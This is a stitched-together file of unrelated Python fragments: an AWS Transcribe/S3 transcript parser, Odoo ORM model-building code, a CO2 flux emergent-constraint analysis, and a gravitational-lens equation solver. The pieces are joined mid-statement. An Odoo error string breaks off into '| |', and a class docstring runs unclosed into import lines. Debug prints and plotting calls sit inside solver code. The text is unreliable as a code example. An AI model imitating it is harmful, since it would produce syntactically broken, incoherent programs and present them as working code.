s3FileKey = cf.appConfig[cf.CONF_PREFIX_MP3_PLAYBACK] + '/' + outputFilename.split('/')[-1]
s3Client.upload_file(outputFilename, cf.appConfig[cf.CONF_S3BUCKET_INPUT], s3FileKey,
ExtraArgs={'ContentType': 'audio/mp3'})
self.audioPlaybackUri = "s3://" + cf.appConfig[cf.CONF_S3BUCKET_INPUT] + "/" + s3FileKey
except Exception as e:
print(e)
print("Unable to create MP3 version of original audio file - could not find FFMPEG libraries")
def parseTranscribeFile(self, transcribeJob):
"""
Parses the output from the specified Transcribe job
"""
# Load in the Amazon Transcribe job header information, ensuring that the job has completed
transcribe = boto3.client("transcribe")
try:
self.transcribeJobInfo = transcribe.get_transcription_job(TranscriptionJobName = transcribeJob)["TranscriptionJob"]
assert self.transcribeJobInfo["TranscriptionJobStatus"] == "COMPLETED", f"Transcription job '{transcribeJob}' has not yet completed."
except transcribe.exceptions.BadRequestException:
assert False, f"Unable to load information for Transcribe job named '{transcribeJob}'."
# Create an MP3 playback file if we have to
self.createPlaybackMP3Audio()
# Pick out the config parameters that we need
outputS3Bucket = cf.appConfig[cf.CONF_S3BUCKET_OUTPUT]
outputS3Key = cf.appConfig[cf.CONF_PREFIX_PARSED_RESULTS]
# Work out the conversation time and set the language code
self.calculateTranscribeConversationTime(transcribeJob)
self.setComprehendLanguageCode(self.transcribeJobInfo["LanguageCode"])
# Download the job JSON results file to a local temp file - redacted if the job used it
# if self.transcribeJobInfo["ContentRedaction"]:
if "ContentRedaction" in self.transcribeJobInfo:
uri = self.transcribeJobInfo["Transcript"]["RedactedTranscriptFileUri"]
else:
uri = self.transcribeJobInfo["Transcript"]["TranscriptFileUri"]
offset = uri.find(outputS3Bucket) + len(outputS3Bucket) + 1
self.jsonOutputFilename = uri[offset:]
jsonFilepath = TMP_DIR + '/' + self.jsonOutputFilename
s3Client = boto3.client('s3')
# Now download - this has been known to get a "404 HeadObject Not Found",
# which makes no sense, so if that happens then retry after a short pause. Only once.
try:
s3Client.download_file(outputS3Bucket, self.jsonOutputFilename, jsonFilepath)
except:
time.sleep(3)
s3Client.download_file(outputS3Bucket, self.jsonOutputFilename, jsonFilepath)
# Before we process, let's load up any required simple entity map
self.loadSimpleEntityStringMap()
_sequence = None #: SQL sequence to use for ID field
_sql_constraints = [] #: SQL constraints [(name, sql_def, message)]
_rec_name = None #: field to use for labeling records, default: ``name``
_order = 'id' #: default order field for searching results
_parent_name = 'parent_id' #: the many2one field used as parent field
_parent_store = False
"""set to True to compute parent_path field.
Alongside a :attr:`~.parent_path` field, sets up an indexed storage
of the tree structure of records, to enable faster hierarchical queries
on the records of the current model using the ``child_of`` and
``parent_of`` domain operators.
"""
_active_name = None #: field to use for active records
_date_name = 'date' #: field to use for default calendar view
_fold_name = 'fold' #: field to determine folded groups in kanban views
_needaction = False # whether the model supports "need actions" (Old API)
_translate = True # False disables translations export for this model (Old API)
_check_company_auto = False
"""On write and create, call ``_check_company`` to ensure companies
consistency on the relational fields having ``check_company=True``
as attribute.
"""
_depends = {}
"""dependencies of models backed up by SQL views
``{model_name: field_names}``, where ``field_names`` is an iterable.
This is only used to determine the changes to flush to database before
executing ``search()`` or ``read_group()``. It won't be used for cache
invalidation or recomputing fields.
"""
# default values for _transient_vacuum()
_transient_max_count = lazy_classproperty(lambda _: config.get('osv_memory_count_limit'))
_transient_max_hours = lazy_classproperty(lambda _: config.get('transient_age_limit'))
CONCURRENCY_CHECK_FIELD = '__last_update'
@api.model
def view_init(self, fields_list):
""" Override this method to do specific things when a form view is
opened. This method is invoked by :meth:`~default_get`.
"""
pass
def _valid_field_parameter(self, field, name):
""" Return whether the given parameter name is valid for the field. """
return name == 'related_sudo'
@api.model
def _add_field(self, name, field):
""" Add the given ``field`` under the given ``name`` in the class """
cls = type(self)
# add field as an attribute and in cls._fields (for reflection)
if not isinstance(getattr(cls, name, field), Field):
_logger.warning("In model %r, field %r overriding existing value", cls._name, name)
setattr(cls, name, field)
cls._fields[name] = field
# basic setup of field
field.setup_base(self, name)
@api.model
def _pop_field(self, name):
""" Remove the field with the given ``name`` from the model.
This method should only be used for manual fields.
"""
cls = type(self)
field = cls._fields.pop(name, None)
if hasattr(cls, name):
delattr(cls, name)
if cls._rec_name == name:
# fixup _rec_name and display_name's dependencies
cls._rec_name = None
cls.display_name.depends = tuple(dep for dep in cls.display_name.depends if dep != name)
return field
@api.model
def _add_magic_fields(self):
""" Introduce magic fields on the current class
* id is a "normal" field (with a specific getter)
* create_uid, create_date, write_uid and write_date have become
"normal" fields
* $CONCURRENCY_CHECK_FIELD is a computed field with its computing
method defined dynamically. Uses ``str(datetime.datetime.utcnow())``
to get the same structure as the previous
``(now() at time zone 'UTC')::timestamp``::
# select (now() at time zone 'UTC')::timestamp;
timezone
----------------------------
2013-06-18 08:30:37.292809
>>> str(datetime.datetime.utcnow())
'2013-06-18 08:31:32.821177'
"""
def add(name, field):
""" add ``field`` with the given ``name`` if it does not exist yet """
if name not in self._fields:
self._add_field(name, field)
# cyclic import
from . import fields
# this field 'id' must override any other column or field
self._add_field('id', fields.Id(automatic=True))
add('display_name', fields.Char(string='Display Name', automatic=True,
compute='_compute_display_name'))
if self._log_access:
add('create_uid', fields.Many2one(
'res.users', string='Created by', automatic=True, readonly=True))
add('create_date', fields.Datetime(
string='Created on', automatic=True, readonly=True))
add('write_uid', fields.Many2one(
'res.users', string='Last Updated by', automatic=True, readonly=True))
add('write_date', fields.Datetime(
string='Last Updated on', automatic=True, readonly=True))
last_modified_name = 'compute_concurrency_field_with_access'
else:
last_modified_name = 'compute_concurrency_field'
# this field must override any other column or field
self._add_field(self.CONCURRENCY_CHECK_FIELD, fields.Datetime(
string='Last Modified on', compute=last_modified_name,
compute_sudo=False, automatic=True))
def compute_concurrency_field(self):
for record in self:
record[self.CONCURRENCY_CHECK_FIELD] = odoo.fields.Datetime.now()
@api.depends('create_date', 'write_date')
def compute_concurrency_field_with_access(self):
for record in self:
record[self.CONCURRENCY_CHECK_FIELD] = \
record.write_date or record.create_date or odoo.fields.Datetime.now()
#
# Goal: try to apply inheritance at the instantiation level and
# put objects in the pool var
#
@classmethod
def _build_model(cls, pool, cr):
""" Instantiate a given model in the registry.
This method creates or extends a "registry" class for the given model.
This "registry" class carries inferred model metadata, and inherits (in
the Python sense) from all classes that define the model, and possibly
other registry classes.
"""
# In the simplest case, the model's registry class inherits from cls and
# the other classes that define the model in a flat hierarchy. The
# registry contains the instance ``model`` (on the left). Its class,
# ``ModelClass``, carries inferred metadata that is shared between all
# the model's instances for this registry only.
#
# class A1(Model): Model
# _name = 'a' / | \
# A3 A2 A1
# class A2(Model): \ | /
# _inherit = 'a' ModelClass
# / \
# class A3(Model): model recordset
# _inherit = 'a'
#
# When a model is extended by '_inherit', its base classes are modified
# to include the current class and the other inherited model classes.
# Note that we actually inherit from other ``ModelClass``, so that
# extensions to an inherited model are immediately visible in the
# current model class, like in the following example:
#
# class A1(Model):
# _name = 'a' Model
# / / \ \
# class B1(Model): / A2 A1 \
# _name = 'b' / \ / \
# B2 ModelA B1
# class B2(Model): \ | /
# _name = 'b' \ | /
# _inherit = ['a', 'b'] \ | /
# ModelB
# class A2(Model):
# _inherit = 'a'
if getattr(cls, '_constraints', None):
_logger.warning("Model attribute '_constraints' is no longer supported, "
"please use @api.constrains on methods instead.")
# Keep links to non-inherited constraints in cls; this is useful for
# instance when exporting translations
cls._local_sql_constraints = cls.__dict__.get('_sql_constraints', [])
# determine inherited models
parents = cls._inherit
parents = [parents] if isinstance(parents, str) else (parents or [])
# determine the model's name
name = cls._name or (len(parents) == 1 and parents[0]) or cls.__name__
# all models except 'base' implicitly inherit from 'base'
if name != 'base':
parents = list(parents) + ['base']
# create or retrieve the model's class
if name in parents:
if name not in pool:
raise TypeError("Model %r does not exist in registry." % name)
ModelClass = pool[name]
ModelClass._build_model_check_base(cls)
check_parent = ModelClass._build_model_check_parent
else:
ModelClass = type(name, (BaseModel,), {
'_name': name,
'_register': False,
'_original_module': cls._module,
'_inherit_module': dict(), # map parent to introducing module
'_inherit_children': OrderedSet(), # names of children models
'_inherits_children': set(), # names of children models
'_fields': OrderedDict(), # populated in _setup_base()
})
check_parent = cls._build_model_check_parent
# determine all the classes the model should inherit from
bases = LastOrderedSet([cls])
for parent in parents:
if parent not in pool:
raise TypeError("Model %r inherits from non-existing model %r." % (name, parent))
parent_class = pool[parent]
if parent == name:
for base in parent_class.__bases__:
bases.add(base)
else:
check_parent(cls, parent_class)
bases.add(parent_class)
ModelClass._inherit_module[parent] = cls._module
parent_class._inherit_children.add(name)
ModelClass.__bases__ = tuple(bases)
# determine the attributes of the model's class
ModelClass._build_model_attributes(pool)
check_pg_name(ModelClass._table)
# Transience
if ModelClass._transient:
assert ModelClass._log_access, \
"TransientModels must have log_access turned on, " \
"in order to implement their vacuum policy"
# link the class to the registry, and update the registry
ModelClass.pool = pool
pool[name] = ModelClass
# backward compatibility: instantiate the model, and initialize it
model = object.__new__(ModelClass)
model.__init__(pool, cr)
return ModelClass
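# Illustrative sketch (assuming standard Odoo model declarations) of the two
# cases _build_model distinguishes. Declaring a fresh _name creates a new
# registry class; naming the model in _inherit (with no new _name) extends the
# existing registry class in place, which is the 'name in parents' branch:
#
#     class Example(models.Model):        # new model: creates pool['example']
#         _name = 'example'
#
#     class ExampleExt(models.Model):     # extension: reuses pool['example']
#         _inherit = 'example'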
@classmethod
def _build_model_check_base(model_class, cls):
""" Check whether ``model_class`` can be extended with ``cls``. """
if model_class._abstract and not cls._abstract:
msg = ("%s transforms the abstract model %r into a non-abstract model. "
"That class should either inherit from AbstractModel, or set a different '_name'.")
raise TypeError(msg % (cls, model_class._name))
if model_class._transient != cls._transient:
if model_class._transient:
msg = ("%s transforms the transient model %r into a non-transient model. "
"That class should either inherit from TransientModel, or set a different '_name'.")
else:
msg = ("%s transforms the model %r into a transient model. "
"That class should either inherit from | |
models = df.model.values
model_families = get_model_families()
family_counts = {k: 0 for k in set(model_families.values())}
for m in models:
family = model_families[m]
family_counts[family] += 1
wgts = []
for m in models:
family = model_families[m]
wgts.append(1./family_counts[family])
xerr = wgts
yerr = wgts
fit_xy = regression_models.linreg_odr(x[~k], y[~k], xerr=xerr, yerr=yerr)
fit_yx = regression_models.linreg_odr(y[~k], x[~k], xerr=yerr, yerr=xerr)
fit_dict = {f'fit_{k}': v for k, v in fit_xy.to_dict().items()}
fit_dict.update({f'yxfit_{k}': v for k, v in fit_yx.to_dict().items()})
return fit_dict
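# Worked example of the family weighting above: if models A1, A2 and A3 share
# one family while B1 sits alone in another, then family_counts is
# {fam_A: 3, fam_B: 1} and wgts = [1/3, 1/3, 1/3, 1], so each family (rather
# than each model) contributes equal total weight to the ODR fits via
# xerr/yerr.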
def get_fit_dict(series, prefix=''):
"""
Pull out all columns starting with "fit_" from pd.Series.
"""
assert isinstance(series, pd.core.series.Series), (
'fit_dict: require series'
)
if prefix:
return {
k.split(f'{prefix}fit_')[-1]: v
for k, v in series.items() if f'{prefix}fit_' in k
}
else:
return {
k.split('fit_')[-1]: v
for k, v in series.items() if 'fit_' in k and 'yxfit' not in k
}
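# Minimal usage sketch for get_fit_dict; the key names are assumptions shaped
# like the f'fit_{...}' / f'yxfit_{...}' keys written by the fitting routine
# above:
#
#     import pandas as pd
#     s = pd.Series({'fit_slope': 2.0, 'fit_intercept': 0.5, 'yxfit_slope': 0.4})
#     get_fit_dict(s)          # -> {'slope': 2.0, 'intercept': 0.5}
#     get_fit_dict(s, 'yx')    # -> {'slope': 0.4}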
class surface_constraint(object):
"""This object computes the emergent flux constraint based on surface data.
Parameters
----------
periods : list of tuples
A list of tuples with year ranges over which to compute the constraint; e.g.
[(1999, 2020), (1999, 2009), (2009, 2020)].
flux_lat_range: [float, float]
The latitude range over which to integrate fluxes.
weight_by_sd_iav : boolean
Use a weighted regression to estimate constraint relationship, with the weights set by the
standard deviation of interannual variability.
seasons : list
The seasons over which to compute the constraint. E.g. ["DJF", "JJA"].
fit_period: string
The year-range in `periods` to use as the "calibrated" constraint. E.g., "1999-2020".
das_srf: dict
Dictionary of observational data contained in pandas.DataFrame's returned from `load_data_surface`.
model_tracer_list: list of tuples
The models and their tracers to use, i.e. [(CT2017, "CO2_OCN"), (CT2019B, "CO2_OCN"), ...]
model_tracer_ext_list : list of tuples
A list of tuples specifying the (model, tracer) pairs to use to estimate "external"
contributions to the observed gradient. I.e., these data are used to correct the
observed estimates of the gradient for land and fossil contributions.
model_list_sfco2_lnd : list of tuples
A list of (model, tracer) pairs used to correct the resulting flux estimate for in-region
land and fossil fuel fluxes. This is only used if the constraint is based on total CO2.
"""
def __init__(self,
periods,
flux_lat_range,
weight_by_sd_iav,
seasons,
fit_period,
das_srf,
model_tracer_list,
model_list_sfco2_lnd=[],
model_tracer_ext_list=None,
):
"""set up the object"""
# incoming parameters
self.periods = periods
self.flux_lat_range = flux_lat_range
self.weight_by_sd_iav = weight_by_sd_iav
self.seasons = seasons
self.fit_period = fit_period
self.model_tracer_list = model_tracer_list
self.model_tracer_ext_list = model_tracer_ext_list
self.model_list_sfco2_lnd = model_list_sfco2_lnd
assert fit_period in [self.period_str(p) for p in periods], (
'`fit_period` must be in periods'
)
# compute gradients
self.hg_obs = self._compute_surface_gradient(das_srf['obs-CO2'])
self._compute_monthly_gradients(das_srf)
# get fluxes
dsets_fluxes = get_dset_fluxes(self.model_tracer_list, self.flux_lat_range)
dsets_fluxes_mmm = get_dset_fluxes_mmm(dsets_fluxes)
df_data, df_fits = self._compute_surface_constraint(
das_srf, dsets_fluxes_mmm,
)
self.df_data = df_data
self.df_fits = df_fits
self._surface_flux = None
self._p_pcov = None
def _compute_surface_gradient(self, das_srf_obs):
lines = []
for period in self.periods:
for season in self.seasons:
obs_gradient_mean, obs_gradient_std = surface_obs_gradient(
das_srf_obs, season, slice(period[0], period[1])
)
lines.append(dict(
period=self.period_str(period),
season=season,
gradient_mean=obs_gradient_mean,
gradient_std=obs_gradient_std,
)
)
return pd.DataFrame(lines).set_index(['period', 'season'])
def _compute_monthly_gradients(self, das_srf):
"""compute all the compontents of the surface constraint"""
lines = []
model_tracer_list = [('obs', 'CO2')] + ensure_components(
self.model_tracer_list + (self.model_tracer_ext_list or [])
)
for month in range(1, 13):
for model, tracer in model_tracer_list:
key = f'{model}-{tracer}'
if key not in das_srf:
print(f'missing {key}, cannot compute monthly gradient')
continue
ds_grad = obs_surface.compute_DCO2y(das_srf[key], month)
for period in self.periods:
gradient = ds_grad.sel(time=slice(period[0], period[1])).CO2
result = dict(
model=model,
tracer=tracer,
period=self.period_str(period),
month=month,
season=get_season(month),
time_bounds=period,
gradient=float(gradient.mean('time').values),
gradient_std=float(gradient.std('time').values),
)
lines.append(result)
self.df_gradients_mon = pd.DataFrame(lines).set_index(
['model', 'tracer', 'period', 'month',]
)
def _compute_surface_constraint(self, das_srf, dsets_fluxes_mmm):
"""compute all the compontents of the surface constraint"""
df_list = []
lines = []
for period in self.periods:
for season in self.seasons:
df = surface_flux_v_gradient(das_srf, dsets_fluxes_mmm[season],
season, slice(period[0], period[1]),
self.model_tracer_list,
)
df['time_bounds'] = [period]*len(df)
df['period'] = [self.period_str(period)]*len(df)
df['season'] = season
df_list.append(df)
result = dict(
season=season, period=self.period_str(period), time=np.mean(period)
)
result.update(
compute_constraint_fit(df, weight_by_sd_iav=self.weight_by_sd_iav)
)
lines.append(result)
df_srf = pd.concat(df_list).set_index(['period', 'season', 'model', 'field'])
df_fits_srf = pd.DataFrame(lines).set_index(['period', 'season'])
return df_srf, df_fits_srf
@property
def surface_flux(self):
"""Return a pandas.DataFrame with the surface flux estimates for each time
range defined in `periods`.
"""
if self._surface_flux is None:
self._surface_flux = self._compute_surface_flux()
return self._surface_flux
def _compute_surface_flux(self):
flux_land = None
flux_land_std = None
if self.model_tracer_ext_list:
df_ext = util.pd_xs_list(self.df_gradients_mon, self.model_tracer_ext_list,
level=('model', 'tracer'))
series_ext_grad = (df_ext
.groupby(['model', 'period', 'season'])
.mean()
.groupby(['period', 'season'])
.gradient.mean()
)
series_ext_grad_std = (df_ext
.groupby(['model', 'period', 'season'])
.mean()
.groupby(['period', 'season'])
.gradient.std()
)
lines = []
for season in self.seasons:
if self.model_list_sfco2_lnd:
ds_sfco2_lnd = get_dset_fluxes_land(
self.flux_lat_range, self.model_list_sfco2_lnd, season_avg=True)[season]
for period in self.periods:
obs_gradient_mean, obs_gradient_std = self.hg_obs.loc[(self.period_str(period), season)]
ext_gradient_mean = 0.
ext_gradient_std = 0.
if self.model_tracer_ext_list:
ext_gradient_mean = series_ext_grad.loc[(self.period_str(period), season)]
ext_gradient_std = series_ext_grad_std.loc[(self.period_str(period), season)]
corrected_gradient_mean = obs_gradient_mean - ext_gradient_mean
corrected_gradient_std = np.sqrt(obs_gradient_std**2 + ext_gradient_std**2)
if self.model_list_sfco2_lnd:
da = ds_sfco2_lnd.FLUX.sel(time=slice(period[0], period[1])).mean('time')
flux_land = float(da.mean('model').values)
flux_land_std = float(da.std('model').values)
fit_dict = get_fit_dict(self.df_fits.loc[self.fit_period, season])
flux_nocorr, flux_error_nocorr = estimate_flux(
fit_dict, obs_gradient_mean, obs_gradient_std,
)
flux, flux_error = estimate_flux(
fit_dict, corrected_gradient_mean, corrected_gradient_std,
flux_land, flux_land_std,
)
lines.append(dict(
period=self.period_str(period),
season=season,
time_bnds=period,
obs_grad=obs_gradient_mean,
obs_grad_err=obs_gradient_std,
corrected_grad=corrected_gradient_mean,
corrected_grad_err=corrected_gradient_std,
flux=flux,
flux_error=flux_error,
flux_land=flux_land,
flux_land_error=flux_land_std,
flux_uncorrected=flux_nocorr,
flux_error_uncorrected=flux_error_nocorr,
))
return pd.DataFrame(lines).set_index(['period', 'season'])
def period_str(self, y1_y2):
return '-'.join([f'{y:04d}' for y in y1_y2])
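# Illustrative construction sketch; every argument value below is an assumption
# for the example (see the class docstring for the real semantics):
#
#     sc = surface_constraint(
#         periods=[(1999, 2020), (1999, 2009), (2009, 2020)],
#         flux_lat_range=[-90., -45.],
#         weight_by_sd_iav=True,
#         seasons=['DJF', 'JJA'],
#         fit_period='1999-2020',
#         das_srf=das_srf,  # dict from load_data_surface()
#         model_tracer_list=[('CT2017', 'CO2_OCN'), ('CT2019B', 'CO2_OCN')],
#     )
#     sc.surface_flux   # DataFrame of flux estimates indexed by (period, season)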
class aircraft_constraint(object):
"""This object computes the aircraft constraint.
This is what happens here:
1. Initialize object with parameters defining the computation;
2. Compute observed gradient and error estimate from campaigns;
3. Group campaigns into `fit_groups` and compute associated DataFrame;
4. Compute fluxes for each campaign based on the associated `fit_group`;
5. Fit a harmonic function to the campaign flux estimates, and use this fit to generate an
annual mean estimate with associated uncertainty.
Parameters
----------
ubin : float
The value of θ on which to center the upper bin.
lbin : float
The value of θ on which to center the lower bin.
udθ : float
The width in θ units of the upper bin.
ldθ : float
The width in θ units of the lower bin.
gradient_lat_range : [float, float]
The latitude range over which to compute the vertical gradient.
flux_memory: float
The time in days over which to average air-sea fluxes in the calculation.
flux_lat_range: [float, float]
The latitude range over which to integrate fluxes.
campaign_time_point: string
Acceptable values: ["center", "end"]; where to set the campaign's time-axis value.
bin_aggregation_method: string
Acceptable values: ["mean", "median"]; how to aggregate aircraft data in the θ bins.
fit_groups: iterable
The groups by which to aggregate campaigns.
model_tracer_list: list of tuples
The models and their tracers to use, i.e. [(CT2017, "CO2_OCN"), (CT2019B, "CO2_OCN"), ...]
dfs_obs: dict
Dictionary of observational data contained in pandas.DataFrame's returned from `load_data`.
dfs_model: dict
Dictionary of simulated observations contained in pandas.DataFrame's returned from `load_data`.
model_groups : dict
A dictionary specifying a grouping of the models; the code returns a model-group-weighted fit.
model_tracer_ext_list : list of tuples
A list of tuples specifying the (model, tracer) pairs to use to estimate "external"
contributions to the observed gradient. I.e., these data are used to correct the
observed estimates of the gradient for land and fossil contributions.
model_list_sfco2_lnd : list of tuples
A list of (model, tracer) pairs used to correct the resulting flux estimate for in-region
land and fossil fuel fluxes. This is only used if the constraint is based on total CO2.
methane_theta_lbound : float
Specifies the θ value above which to relate CH4 and CO2. This is only relevant if
`use_methane_gradient_correction=True`, which is not the case by default. This option
was something we explored, but did not feel it well justified, so did not implement in the
final computation.
use_methane_gradient_correction: boolean
Use vertical gradients of CH4 to correct observed gradient; this option is not scientifically
justified and should not be used.
import numpy as np
import lenstronomy.Util.util as util
import lenstronomy.Util.image_util as image_util
from scipy.optimize import minimize
from lenstronomy.LensModel.Solver.epl_shear_solver import solve_lenseq_pemd
from lenstronomy.LensModel.Solver.lens_equation_solver import LensEquationSolver
from numba import njit, jit
import numba.np.extensions
import pylab as plt
__all__ = ['LensEquationSolverGravLens']
@njit
def contains_solution(a,b,c,x):
#da, db, dc = a-x, b-x, c-x
da = a-x
db = b-x
dc = c-x
cross1 = numba.np.extensions.cross2d(da, db)
cross2 = numba.np.extensions.cross2d(db, dc)
cross3 = numba.np.extensions.cross2d(dc, da)
return (cross1*cross2 > 0) * (cross2*cross3 > 0)
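# Worked example of the sign test above (numbers invented for illustration):
# for the triangle a=(0,0), b=(1,0), c=(0,1) and interior point x=(0.2,0.2),
# the three edge cross products are 0.2, 0.6 and 0.2 (all one sign), so the
# function returns True; for x=(1,1) they are 1, -1 and 1 (mixed signs), so it
# returns False. Only two same-sign products need testing, because same sign
# for (1,2) and (2,3) already implies the same sign for (3,1).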
class LensEquationSolverGravLens(LensEquationSolver):
def _test_critical_curve(self, a,b,c, kwargs_lens):
mu0 = self.lensModel.magnification(a[0], a[1], kwargs_lens)
mu1 = self.lensModel.magnification(b[0], b[1], kwargs_lens)
mu2 = self.lensModel.magnification(c[0], c[1], kwargs_lens)
return (mu0*mu1>0)*(mu1*mu2>0)
def _refine_candidate_solution(self, a, b, c, source_a, source_b, source_c, sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels = 10, iteration = 0, delta_map_threshold = 1e-5):
''' Refines the candidate solution recursively
a ---d--- b
\ | /
\ | / <- Splits triangle into two pieces using vector d in the graph here
\ | /
\|/
c
a,b, c are 2D vectors.
Note: Assumes one solution only
'''
v = np.array([a,b,c])
sv= np.array([source_a,source_b,source_c])
dv= np.array([b-a,c-b,a-c])
i0= np.argmax(np.linalg.norm(dv,axis=1))
d = v[i0]+dv[i0]*0.5
source_d = np.array(self.lensModel.ray_shooting(d[0], d[1], kwargs_lens))
x = np.array([sourcePos_x, sourcePos_y])
print("Iteration", iteration, np.linalg.norm(source_d-x))
if iteration >= max_refinement_levels or np.linalg.norm(source_d-x) < delta_map_threshold:
# Found the final solution
return d
if contains_solution(source_d,sv[(i0+2)%3],sv[i0],x):
return self._refine_candidate_solution(d, v[(i0+2)%3], v[i0], source_d, sv[(i0+2)%3], sv[i0], sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels, iteration + 1, delta_map_threshold)
if contains_solution(source_d,sv[(i0+2)%3],sv[(i0+1)%3],x):
return self._refine_candidate_solution(d, v[(i0+2)%3], v[(i0+1)%3], source_d, sv[(i0+2)%3], sv[(i0+1)%3], sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels, iteration + 1, delta_map_threshold)
else:
plt.plot([sv[0][0],sv[1][0],sv[2][0],sv[0][0]],[sv[0][1],sv[1][1],sv[2][1],sv[0][1]])
plt.scatter(sourcePos_x, sourcePos_y)
plt.show()
print( self._test_critical_curve(sv[0],sv[1],sv[2], kwargs_lens) )
raise ValueError("Solution not found")
def candidate_solutions(self, sourcePos_x, sourcePos_y, kwargs_lens, min_distance=0.1, search_window=10,
verbose=False, x_center=0, y_center=0):
"""
finds pixels in the image plane possibly hosting a solution of the lens equation, for the given source position and lens model, using Keeton's methodology (Keeton, 2001)
:param sourcePos_x: source position in units of angle
:param sourcePos_y: source position in units of angle
:param kwargs_lens: lens model parameters as keyword arguments
:param min_distance: minimum separation to consider for two images in units of angle
:param search_window: window size to be considered by the solver. Will not find image position outside this window
:param verbose: bool, if True, prints some useful information for the user
:param x_center: float, center of the window to search for point sources
:param y_center: float, center of the window to search for point sources
:returns: (approximate) angular position of (multiple) images ra_pos, dec_pos in units of angles, related ray-traced source displacements and pixel width
:raises: AttributeError, KeyError
"""
kwargs_lens = self.lensModel.set_static(kwargs_lens)
# compute number of pixels to cover the search window with the required min_distance
numPix = int(round(search_window / min_distance) + 0.5)
x_grid, y_grid = util.make_grid(numPix, min_distance)
x_grid += x_center
y_grid += y_center
print(np.min(x_grid), np.max(x_grid))
# ray-shoot to find the relative distance to the required source position for each grid point
x_mapped, y_mapped = self.lensModel.ray_shooting(x_grid, y_grid, kwargs_lens)
# Minus out the source position
x_mapped = x_mapped - sourcePos_x
y_mapped = y_mapped - sourcePos_y
# Create du_(ij), du_(i+1j), du_(ij+1), du_(i+1j+1)
x_mapped, y_mapped \
= np.reshape(x_mapped, (numPix, numPix)), np.reshape(y_mapped, (numPix, numPix))
du00 = np.transpose([np.reshape(x_mapped[:-1, :-1], (numPix-1)**2), np.reshape(y_mapped[:-1, :-1], (numPix-1)**2)])
du10 = np.transpose([np.reshape(x_mapped[1:, :-1], (numPix-1)**2), np.reshape(y_mapped[1:, :-1], (numPix-1)**2)])
du01 = np.transpose([np.reshape(x_mapped[:-1, 1:], (numPix-1)**2), np.reshape(y_mapped[:-1, 1:], (numPix-1)**2)])
du11 = np.transpose([np.reshape(x_mapped[1:, 1:], (numPix-1)**2), np.reshape(y_mapped[1:, 1:], (numPix-1)**2)])
# Compute all the cross products between each vector
ucross1 = np.cross(du00, du10)
ucross2 = np.cross(du10, du11)
ucross3 = np.cross(du11, du00)
idx1 = (ucross1*ucross2 > 0) * (ucross2*ucross3 > 0)
# 10 ucross2 11
# ucross3
# ucross1 ucross3
# ucross3
#
# 00 01
ucross1 = np.cross(du00, du01)
ucross2 = np.cross(du01, du11)
#ucross3 = np.cross(du11, du00)
idx2 = (ucross1*ucross2 > 0) * (ucross2*ucross3 > 0)
# 10 11
# ucross3
# ucross3 ucross2
# ucross3
#
# 00 ucross1 01
# Combine solutions:
idx = (idx1+idx2)>0
# # Take out all pixels that contain a critical curve:
mu = self.lensModel.magnification(x_grid, y_grid, kwargs_lens)
mu = np.reshape(mu, (numPix, numPix))
mu00 = np.reshape(mu[:-1, :-1], (numPix-1)**2)
mu10 = np.reshape(mu[1:, :-1], (numPix-1)**2)
mu01 = np.reshape(mu[:-1, 1:], (numPix-1)**2)
mu11 = np.reshape(mu[1:, 1:], (numPix-1)**2)
idxmu = (mu00*mu10>0)*(mu10*mu01>=0)*(mu01*mu11>=0)
idx1 = idx1 * idxmu
idx2 = idx2 * idxmu
# Get x, y on the image plane
x_grid, y_grid = np.reshape(x_grid, (numPix, numPix)), np.reshape(y_grid, (numPix, numPix))
# Pixel width: the grid spacing equals min_distance by construction of make_grid
pixel_width = min_distance
# Get solutions
x00 = np.transpose([np.reshape(x_grid[:-1, :-1], (numPix-1)**2)[idx1], np.reshape(y_grid[:-1, :-1], (numPix-1)**2)[idx1] ])
x10 = np.transpose([np.reshape(x_grid[1:, :-1], (numPix-1)**2)[idx1], np.reshape(y_grid[1:, :-1], (numPix-1)**2)[idx1] ])
x01 = np.transpose([np.reshape(x_grid[:-1, 1:], (numPix-1)**2)[idx1], np.reshape(y_grid[:-1, 1:], (numPix-1)**2)[idx1] ])
x11 = np.transpose([np.reshape(x_grid[1:, 1:], (numPix-1)**2)[idx1], np.reshape(y_grid[1:, 1:], (numPix-1)**2)[idx1] ])
u00 = du00[idx1]+np.array([sourcePos_x, sourcePos_y])
u01 = du01[idx1]+np.array([sourcePos_x, sourcePos_y])
u10 = du10[idx1]+np.array([sourcePos_x, sourcePos_y])
u11 = du11[idx1]+np.array([sourcePos_x, sourcePos_y])
# Refine solutions:
x_mins, y_mins = [], []
for i in range(len(x00)):
x_refined = self._refine_candidate_solution(x00[i], x10[i], x11[i], u00[i], u10[i], u11[i], sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels = 100, iteration = 0, delta_map_threshold = 1e-7)
x_mins.append(x_refined[0])
y_mins.append(x_refined[1])
# Get solutions
x00 = np.transpose([np.reshape(x_grid[:-1, :-1], (numPix-1)**2)[idx2], np.reshape(y_grid[:-1, :-1], (numPix-1)**2)[idx2] ])
x10 = np.transpose([np.reshape(x_grid[1:, :-1], (numPix-1)**2)[idx2], np.reshape(y_grid[1:, :-1], (numPix-1)**2)[idx2] ])
x01 = np.transpose([np.reshape(x_grid[:-1, 1:], (numPix-1)**2)[idx2], np.reshape(y_grid[:-1, 1:], (numPix-1)**2)[idx2] ])
x11 = np.transpose([np.reshape(x_grid[1:, 1:], (numPix-1)**2)[idx2], np.reshape(y_grid[1:, 1:], (numPix-1)**2)[idx2] ])
u00 = du00[idx2]+np.array([sourcePos_x, sourcePos_y])
u01 = du01[idx2]+np.array([sourcePos_x, sourcePos_y])
u10 = du10[idx2]+np.array([sourcePos_x, sourcePos_y])
u11 = du11[idx2]+np.array([sourcePos_x, sourcePos_y])
# Refine solutions:
for i in range(len(x00)):
x_refined = self._refine_candidate_solution(x00[i], x01[i], x11[i], u00[i], u01[i], u11[i], sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels = 1000, iteration = 0, delta_map_threshold = 1e-5)
x_mins.append(x_refined[0])
y_mins.append(x_refined[1])
x_mins, y_mins = np.array(x_mins), np.array(y_mins)
# Get the delta_map
du = np.transpose(self.lensModel.ray_shooting(x_mins, y_mins, kwargs_lens))-np.array([sourcePos_x,sourcePos_y])
delta_map = np.sqrt(np.sum(du**2, axis=1))
return x_mins[delta_map<1.e-3], y_mins[delta_map<1.e-3], delta_map[delta_map<1.e-3], pixel_width
